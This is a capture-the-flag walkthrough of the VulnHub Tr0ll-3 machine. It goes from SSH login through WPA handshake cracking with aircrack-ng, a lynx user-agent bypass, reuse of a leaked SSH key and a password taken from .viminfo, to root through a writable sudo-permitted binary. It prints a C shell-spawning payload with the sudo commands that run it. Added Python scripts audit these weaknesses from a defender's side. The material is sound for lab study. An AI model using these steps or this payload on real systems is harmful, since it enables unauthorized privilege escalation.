VulnHub machine walkthrough [Tr0ll-3]

Name

Name: Tr0ll: 3
Release date: 6 August 2019

Download

  • Download: https://drive.google.com/file/d/1Jshz0VifMrw3S-Kcq8C3nf9HMQtXuKrW/view
  • Download (Mirror): https://download.vulnhub.com/tr0ll/Tr0ll3.ova
  • Download (Torrent): https://download.vulnhub.com/tr0ll/Tr0ll3.ova.torrent

Description

The latest release in the Tr0ll series. This one is a little different from the previous iterations, but is still at the Beginner++ level. Hope everyone has fun, and make sure to tag @Maleus21 in the screenshot of the flag.

You will need to log in over SSH with start:here.

Type: Boot 2 root
Goal: get flag.txt
Difficulty: Beginner++
Fun level: over 9000

Information gathering

Bring out nmap

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.120
Host is up (0.00018s latency).
MAC Address: 08:00:27:C3:39:77 (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -v -sV -p- 192.168.56.120
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

Log in to SSH with the default credentials

root@kali:~# ssh start@192.168.56.120
Enter passphrase for key '/root/.ssh/id_rsa':
start@192.168.56.120's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

start@Tr0ll3:~$ id
uid=1001(start) gid=1001(start) groups=1001(start)
start@Tr0ll3:~$ whoami
start
start@Tr0ll3:~$ ls
bluepill redpill
start@Tr0ll3:~$

As shown below, use find to enumerate writable files that have the full 0777 permission set.

start@Tr0ll3:~$ find / -type f -perm 0777 2>/dev/null
/var/log/.dist-manage/wytshadow.cap
/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt

Two interesting files are found: a .cap file (wytshadow.cap) and a text file (gold_star.txt).

Download both of them and analyse them.

With the .cap file, opening it in Wireshark shows every packet marked with the “802.11” protocol, and the captured traffic looks like wireless network packets, since 802.11 is the protocol used to carry packets between wirelessly connected devices.

Hmm! aircrack-ng may help extract the password here. gold_star.txt can be used as the wordlist against wytshadow.cap, as shown below.

root@kali:~/vulnhub/troll3# aircrack-ng -w gold_star.txt wytshadow.cap
Reading packets, please wait...
Opening wytshadow.cap
Read 1183 packets.

# BSSID ESSID Encryption

1 18:D6:C7:3F:23:89 wytshadow WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening wytshadow.cap
Read 1183 packets.

1 potential targets


Aircrack-ng 1.6

[00:04:34] 2451168/3248872 keys tested (9090.46 k/s)

Time left: 1 minute, 27 seconds 75.45%

KEY FOUND! [ gaUoCe34t1 ]


Master Key : ED 12 0B 40 F5 AF 80 16 F5 F7 4F 9F 9E 39 BB AE
00 32 07 E9 26 81 31 DB 9C 54 64 84 5E 5D 19 C6

Transient Key : 7F 1C A9 01 4E B9 B3 6F B3 95 7D D2 6E C9 10 BE
50 D4 1A 6C 72 F8 AB 8B 97 A4 20 B1 2D 92 19 18
C7 86 C0 17 2D 05 28 C7 6F 95 06 12 4F C2 F5 2A
87 B7 F5 21 22 3D F7 CA BC 99 8B B5 CA 15 EA 43

EAPOL HMAC : 73 4D E4 22 8E B7 F2 91 4E 74 7D CF 59 73 80 F7

Awesome!! aircrack-ng gave up the password: gaUoCe34t1.

With the password in hand, switch to the other account, wytshadow, using the credentials wytshadow:gaUoCe34t1.

start@Tr0ll3:~$ su wytshadow
Password:
wytshadow@Tr0ll3:/home/start$ id
uid=1003(wytshadow) gid=1003(wytshadow) groups=1003(wytshadow)
wytshadow@Tr0ll3:/home/start$ whoami
wytshadow
wytshadow@Tr0ll3:/home/start$ pwd
/home/start
wytshadow@Tr0ll3:/home/start$ ls
ls: cannot open directory '.': Permission denied

After logging in successfully, I looked at the directory and file listing under the “/” directory and noticed a file named oohfun with the SUID bit set, so it has permission to run as root.

With that in mind, I ran the file as shown. It points at LYNX by printing the same text message over and over.

wytshadow@Tr0ll3:~$ pwd
/home/wytshadow
wytshadow@Tr0ll3:~$ ./oohfun
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX

Lynx is a command-line browser; perhaps it will be needed for further work.

Next, checking wytshadow's sudo rights shows that nginx can be started as root.

wytshadow@Tr0ll3:~$ sudo -l
[sudo] password for wytshadow:
Matching Defaults entries for wytshadow on Tr0ll3:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wytshadow may run the following commands on Tr0ll3:
(root) /usr/sbin/service nginx start

Walk through the nginx directory and open its site configuration file under sites-enabled. It can be seen that the user agent must be Lynx and that the server listens on 8080.

As shown below

wytshadow@Tr0ll3:/etc/nginx/sites-enabled$ cat default 
##
# You should look at the following URL's in order to grasp a solid understanding
# of Nginx configuration files in order to fully unleash the power of Nginx.
# https://www.nginx.com/resources/wiki/start/
# https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/
# https://wiki.debian.org/Nginx/DirectoryStructure
#
# In most cases, administrators will remove this file from sites-enabled/ and
# leave it as reference inside of sites-available where it will continue to be
# updated by the nginx packaging team.
#
# This file will automatically load configuration files provided by other
# applications, such as Drupal or Wordpress. These applications will be made
# available underneath a path with that package name, such as /drupal8.
#
# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
##

# Default server configuration
#
server {
listen 8080 default_server;
listen [::]:8080 default_server;
if ($http_user_agent !~ "Lynx*"){
return 403;
}
# SSL configuration
#
# listen 443 ssl default_server;
# listen [::]:443 ssl default_server;
#
# Note: You should disable gzip for SSL traffic.
# See: https://bugs.debian.org/773332
#
# Read up on ssl_ciphers to ensure a secure configuration.
# See: https://bugs.debian.org/765782
#
# Self signed certs generated by the ssl-cert package
# Don't use them in a production server!
#
# include snippets/snakeoil.conf;

root /var/nginx/www;

# Add index.php to the list if you are using PHP
index index.html index.htm index.nginx-debian.html;

server_name _;

location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
}

# pass PHP scripts to FastCGI server
#
#location ~ \.php$ {
# include snippets/fastcgi-php.conf;
#
# # With php-fpm (or other unix sockets):
# fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
# # With php-cgi (or other tcp sockets):
# fastcgi_pass 127.0.0.1:9000;
#}

# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
#location ~ /\.ht {
# deny all;
#}
}


# Virtual Host configuration for example.com
#
# You can move that to a different file under sites-available/ and symlink that
# to sites-enabled/ to enable it.
#
#server {
# listen 80;
# listen [::]:80;
#
# server_name example.com;
#
# root /var/www/example.com;
# index index.html;
#
# location / {
# try_files $uri $uri/ =404;
# }
#}
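The site config above gates on `if ($http_user_agent !~ "Lynx*")`. Two things are worth knowing as a defender: nginx's `~`/`!~` operators are PCRE regex searches, not shell globs, so `"Lynx*"` actually means "Lyn followed by zero or more x, anywhere in the header"; and the User-Agent header is entirely client-controlled, so such a rule is obscurity, not access control. The following script is an added example (not part of the original write-up or the box) that mirrors the rule's logic in Python and compares it with an anchored pattern; `STRICT_PATTERN` and the sample user agents are constructed for the example.

```python
import re

# Pattern exactly as it appears in the box's nginx site config:
#   if ($http_user_agent !~ "Lynx*") { return 403; }
# nginx's ~ and !~ operators are PCRE regex searches, not shell globs, so
# "Lynx*" means "Lyn" followed by zero or more "x", found anywhere in the UA.
WEAK_PATTERN = "Lynx*"

# An anchored alternative (an assumption for this example, not the box's config):
# the UA must start with "Lynx/".
STRICT_PATTERN = r"^Lynx/"

# Constructed sample user agents; only the first is a real Lynx-style UA string.
SAMPLE_AGENTS = [
    "Lynx/2.8.9rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/1.1.1",
    "curl/7.68.0",
    "Mozilla/5.0 (X11; Linux x86_64) Lyn",   # contains "Lyn" but is not Lynx
    "lynx/2.8.9",                             # lower case: nginx ~ is case-sensitive
]


def nginx_allows(user_agent: str, pattern: str) -> bool:
    """Mirror the config: the request is served unless the UA fails the regex search."""
    return re.search(pattern, user_agent) is not None


def compare_patterns(agents):
    """Return {ua: (served_by_weak_pattern, served_by_strict_pattern)} for each UA."""
    return {ua: (nginx_allows(ua, WEAK_PATTERN), nginx_allows(ua, STRICT_PATTERN))
            for ua in agents}


if __name__ == "__main__":
    print("weak   / strict  user agent")
    for ua, (weak, strict) in compare_patterns(SAMPLE_AGENTS).items():
        print(f"{'served' if weak else '403   '} / {'served' if strict else '403   '}  {ua}")
```

Even the anchored pattern only changes which header value the client has to send; the box itself demonstrates the bypass by simply using lynx. If a page must be restricted, put authentication in front of it rather than a header check.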

Also, as shown above, I started the nginx service. Using netstat, port 8080 can be seen to be open. Running the nmap scan again confirms it, as shown below.

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8080/tcp open http nginx 1.14.0 (Ubuntu)
wytshadow@Tr0ll3:/etc/nginx/sites-enabled$ sudo /usr/sbin/service nginx start
wytshadow@Tr0ll3:/etc/nginx/sites-enabled$ netstat -antp
(No info could be read for "-p": geteuid()=1003 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 192.168.56.120:22 192.168.56.1:20737 ESTABLISHED -
tcp 0 448 192.168.56.120:22 192.168.56.102:48480 ESTABLISHED -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -

As hinted earlier, install the lynx browser on the local machine and open the page served on the newly opened port.

root@kali:~/vulnhub/troll3# apt-get install lynx
...
root@kali:~/vulnhub/troll3# lynx http://192.168.56.120:8080/
genphlux:HF9nd0cR!

Opening the link given on the page through lynx reveals these login credentials. Not that hard.

Credentials found:

Username: genphlux
Password: HF9nd0cR!

With more credentials in hand, switch to the genphlux user using the credentials enumerated above.

wytshadow@Tr0ll3:/home$ su genphlux
Password:
genphlux@Tr0ll3:/home$ id
uid=1004(genphlux) gid=1004(genphlux) groups=1004(genphlux)
genphlux@Tr0ll3:/home$ whoami
genphlux
genphlux@Tr0ll3:/home$ pwd
/home
genphlux@Tr0ll3:/home$

After logging in, a file named maleus is found, as shown below, and on inspecting it, it turns out to hold an RSA private key.

genphlux@Tr0ll3:/home$ cd
genphlux@Tr0ll3:~$ ls -la
total 44
drwx------ 4 genphlux genphlux 4096 Aug 2 2019 .
drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
-rw-r--r-- 1 genphlux genphlux 220 Jun 17 2015 .bash_logout
-rw-r--r-- 1 genphlux genphlux 3637 Jun 17 2015 .bashrc
drwx------ 2 genphlux genphlux 4096 Jun 17 2015 .cache
drwx------ 3 genphlux genphlux 4096 Aug 1 2019 .gnupg
-rw-rw-r-- 1 genphlux genphlux 1675 Jun 18 2015 maleus
-rw-r--r-- 1 genphlux genphlux 675 Jun 17 2015 .profile
-rw------- 1 genphlux genphlux 5649 Jun 17 2015 .viminfo
-rw-rw-r-- 1 genphlux genphlux 931 Aug 2 2019 xlogin
genphlux@Tr0ll3:~$ file maleus
maleus: PEM RSA private key
genphlux@Tr0ll3:~$ cat maleus
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

So I copied the RSA key into a text file named key and gave it mode 600, so that only the owning user can access it.

root@kali:~/vulnhub/troll3# chmod 600 key
root@kali:~/vulnhub/troll3# ssh maleus@192.168.56.120 -i key
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

maleus@Tr0ll3:~$ id
uid=1000(maleus) gid=1000(maleus) groups=1000(maleus),1005(backups)
maleus@Tr0ll3:~$ whoami
maleus
maleus@Tr0ll3:~$ pwd
/home/maleus

After logging in successfully, a file named dont_even_bother with full permissions is found; checking it with file shows it is a 64-bit ELF. In addition, a .viminfo file is found in the same directory.

maleus@Tr0ll3:~$ ls -la
total 48
drwx------ 5 maleus maleus 4096 Aug 2 2019 .
drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
-rw-r--r-- 1 maleus maleus 220 Jun 17 2015 .bash_logout
-rw-r--r-- 1 maleus maleus 3637 Jun 17 2015 .bashrc
drwx------ 2 maleus maleus 4096 Jun 17 2015 .cache
-rwxrwxr-x 1 maleus maleus 8674 Jun 18 2015 dont_even_bother
drwx------ 3 maleus maleus 4096 Aug 1 2019 .gnupg
-rw-r--r-- 1 maleus maleus 675 Jun 17 2015 .profile
drwx------ 2 maleus maleus 4096 Jun 18 2015 .ssh
-rw------- 1 maleus maleus 1301 Aug 2 2019 .viminfo

Next, use cat to inspect the viminfo file. On close inspection, the maleus user's password “B^slc8I$” is found in it. A nice find.

maleus@Tr0ll3:~$ cat .viminfo
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:wq
:q
:q!
:!shell

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:
""1 LINE 0
passwd
"2 LINE 0
B^slc8I$
"3 LINE 0
passswd

# File marks:

# Jumplist (newest first):

# History of marks within files (newest to oldest):

+ 25 62

> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
> ~/Desktop/troll3/maleus
* 1564779412 0
" 27 28
^ 27 29
. 27 28
+ 27 28
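Vim persists the contents of its registers (yanked and deleted text) in .viminfo, which is why a password that was ever copied while editing a credentials file can sit there long after the file itself was locked down. The parser below is an added example, not part of the original write-up or of Vim: it reads the Registers section of a viminfo file and flags a single-line register that sits next to a register mentioning "passwd", the pattern seen above. The sample viminfo text is constructed to mirror the box's file (Vim writes the header fields and content lines tab-separated); `suspicious_registers` is an audit heuristic I introduce here, useful for a defender sweeping home directories for leftover secrets.

```python
import re

# Constructed sample modelled on the .viminfo dumped on the box. Vim writes each
# register as a header line followed by its content lines, indented with a tab.
SAMPLE_VIMINFO = """\
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!

# Command Line History (newest to oldest):
:wq
:q

# Registers:
""1\tLINE\t0
\tpasswd
"2\tLINE\t0
\tB^slc8I$
"3\tLINE\t0
\tpassswd

# File marks:
"""

# Register header: a leading quote, an optional second quote (marks that this
# register is also the unnamed register ""), the register name, then
# LINE/CHAR/BLOCK and a flags field.
HEADER_RE = re.compile(r'^"(?P<unnamed>"?)(?P<name>\S+)\s+(?P<kind>LINE|CHAR|BLOCK)\s+\d+')

# Words that suggest a register was used while editing a credentials file.
PASSWORD_HINT = re.compile(r"pas+w(or)?d", re.IGNORECASE)


def parse_registers(text: str):
    """Return {name: {"kind", "unnamed", "lines"}} from the Registers section of viminfo text."""
    registers = {}
    in_section = False
    current = None
    for line in text.splitlines():
        if line.startswith("# Registers"):
            in_section = True
            continue
        if not in_section:
            continue
        if line.startswith("# "):        # next section header ends the register list
            break
        m = HEADER_RE.match(line)
        if m:
            current = m.group("name")
            registers[current] = {"kind": m.group("kind"),
                                  "unnamed": m.group("unnamed") == '"',
                                  "lines": []}
        elif current is not None and line.strip():
            # Content lines carry a leading tab in real files; the page's dump lost it.
            registers[current]["lines"].append(line.lstrip("\t"))
    return registers


def suspicious_registers(registers):
    """Audit heuristic: single-line registers adjacent to a register mentioning a password."""
    names = list(registers)
    hits = []
    for i, name in enumerate(names):
        lines = registers[name]["lines"]
        if len(lines) != 1 or PASSWORD_HINT.search(lines[0]):
            continue
        neighbours = [registers[n]["lines"] for n in names[max(0, i - 1):i + 2] if n != name]
        if any(PASSWORD_HINT.search(text) for nb in neighbours for text in nb):
            hits.append((name, lines[0]))
    return hits


if __name__ == "__main__":
    regs = parse_registers(SAMPLE_VIMINFO)
    for name, reg in regs.items():
        print(f'register "{name} ({reg["kind"]}): {reg["lines"]}')
    print("suspicious:", suspicious_registers(regs))
```

The same parser can be pointed at every `~/.viminfo` on a host during a review; the remediation is to delete the stale file (or set `viminfo=` in vimrc so registers are never written out), and to rotate anything found in it.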

Privilege escalation

Now that we have maleus's password, check maleus's sudo rights.

maleus@Tr0ll3:~$ sudo -l
[sudo] password for maleus:
Matching Defaults entries for maleus on Tr0ll3:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User maleus may run the following commands on Tr0ll3:
(root) /home/maleus/dont_even_bother

Running the command shows that maleus can run the dont_even_bother file as root. So, to escalate privileges on this machine, this file will be used to inject malicious code. First, empty the file's contents with echo, then edit it with nano.
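The root cause here is not the binary but the sudo rule: a rule that lets a user run, as root, a file the same user (or anyone) can write or replace is equivalent to unrestricted root. The script below is an added example, not part of the original write-up: it parses lines in the shape `sudo -l` prints (such as `(root) /home/maleus/dont_even_bother`) and checks, with classic Unix permission bits, whether the invoking user could change what gets executed, either by writing the file or by replacing it through a writable parent directory. `demo()` builds constructed fixtures in a temporary directory (a 775 file owned by the current user, like the one on the box, and a 755 file audited as a different non-root user); the rule format handling and `RULE_RE` are my assumptions, not sudo's own parser.

```python
import os
import re
import stat
import tempfile

# One line of "sudo -l" output, e.g. "(root) /home/maleus/dont_even_bother" or
# "(root) NOPASSWD: /usr/sbin/service nginx start" (regex is an assumption for this example).
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$")

FILE_WRITABLE = "command file writable by the invoking user"
DIR_WRITABLE = "parent directory writable by the invoking user (command can be replaced)"
MISSING = "command does not exist (could be created by the invoking user)"


def parse_rule(line: str):
    """Split a sudo -l rule line into run-as user, command path, arguments and tags."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    return {
        "runas": m.group("runas"),
        "cmd": m.group("cmd"),
        "args": m.group("args").strip(),
        "nopasswd": "NOPASSWD:" in m.group("tags"),
    }


def mode_allows_write(st: os.stat_result, uid: int, gid: int) -> bool:
    """Classic Unix write check: owner bits if owner, else group bits, else other (ACLs ignored)."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid == gid:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_rule(line: str, uid: int, gid: int):
    """Report whether the invoking user (uid/gid) could alter what the rule executes."""
    rule = parse_rule(line)
    if rule is None:
        return None
    findings = []
    path = rule["cmd"]
    try:
        if mode_allows_write(os.stat(path), uid, gid):
            findings.append(FILE_WRITABLE)
    except FileNotFoundError:
        findings.append(MISSING)
    parent = os.path.dirname(path) or "/"
    try:
        pst = os.stat(parent)
        # A writable parent lets the user rename/replace the file even if the file
        # itself is read-only; a sticky directory not owned by the user is treated
        # as blocking that (an approximation sufficient for an audit).
        sticky_blocks = bool(pst.st_mode & stat.S_ISVTX) and pst.st_uid != uid
        if mode_allows_write(pst, uid, gid) and not sticky_blocks:
            findings.append(DIR_WRITABLE)
    except FileNotFoundError:
        pass
    return {"rule": rule, "findings": findings}


def demo():
    """Audit two constructed fixtures: a loose 775 file as its owner, a 755 file as another user."""
    me_uid, me_gid = os.getuid(), os.getgid()
    other_uid, other_gid = me_uid + 1, me_gid + 1   # some other, non-root user
    workdir = tempfile.mkdtemp()
    os.chmod(workdir, 0o700)

    loose = os.path.join(workdir, "dont_even_bother")   # mirrors -rwxrwxr-x on the box
    with open(loose, "w") as fh:
        fh.write("#!/bin/sh\necho placeholder\n")
    os.chmod(loose, 0o775)

    tight = os.path.join(workdir, "safe_tool")
    with open(tight, "w") as fh:
        fh.write("#!/bin/sh\necho placeholder\n")
    os.chmod(tight, 0o755)

    return {
        "loose": audit_rule(f"(root) {loose}", me_uid, me_gid),
        "tight": audit_rule(f"(root) {tight}", other_uid, other_gid),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result["rule"]["cmd"], "->", result["findings"] or ["ok"])
```

In a real review the same check is run against every command in `sudo -l -U <user>` output with that user's uid/gid; anything that is writable by the user, world-writable, or located under the user's home directory should be moved to a root-owned, 755 path before the rule is kept.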

maleus@Tr0ll3:~$ echo "" > dont_even_bother
maleus@Tr0ll3:~$ cat dont_even_bother

maleus@Tr0ll3:~$ nano dont_even_bother.c

Now, with the file open, write a small C program that spawns a shell when the compiled binary is executed.

#define _GNU_SOURCE   /* needed for the setresuid() declaration in glibc */
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setresuid() */

int main(void) {
    setresuid(0, 0, 0);  /* run via sudo, so set real/effective/saved uid to root */
    system("/bin/sh");   /* spawn a shell with those privileges */
}

Now, since it is a .c file, it has to be compiled with gcc, and then dont_even_bother is executed under the sudo rule.

That gives root on the system, and the flag file is found, as shown below:

maleus@Tr0ll3:~$ ls
dont_even_bother dont_even_bother.c
maleus@Tr0ll3:~$ gcc dont_even_bother.c -o dont_even_bother
dont_even_bother.c: In function ‘main’:
dont_even_bother.c:2:8: warning: implicit declaration of function ‘setresuid’ [-Wimplicit-function-declaration]
setresuid(0, 0, 0);
^~~~~~~~~
dont_even_bother.c:3:8: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
system("/bin/sh");
^~~~~~
maleus@Tr0ll3:~$ sudo /home/maleus/dont_even_bother
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwed
/bin/sh: 3: pwed: not found
# pwd
/home/maleus
# cd /root
# ls
flag.txt
# cat flag.txt
You are truly a Jedi!

Twitter Proof:

Pr00fThatTh3L33tHax0rG0tTheFl@g!!

@Maleus21

Summary of key points

  • aircrack-ng: cracking the password from a .cap capture
  • nginx user-agent check
  • Using the lynx browser
  • SSH login with an RSA key
  • Password leaked through a .viminfo file
  • Privilege escalation with a setresuid(0, 0, 0) C program

Game over

Sorry, this time I still couldn't find that Greek master's idiot-proof one-click script; I am so sorry about this… It's a pity…

The end, to be continued…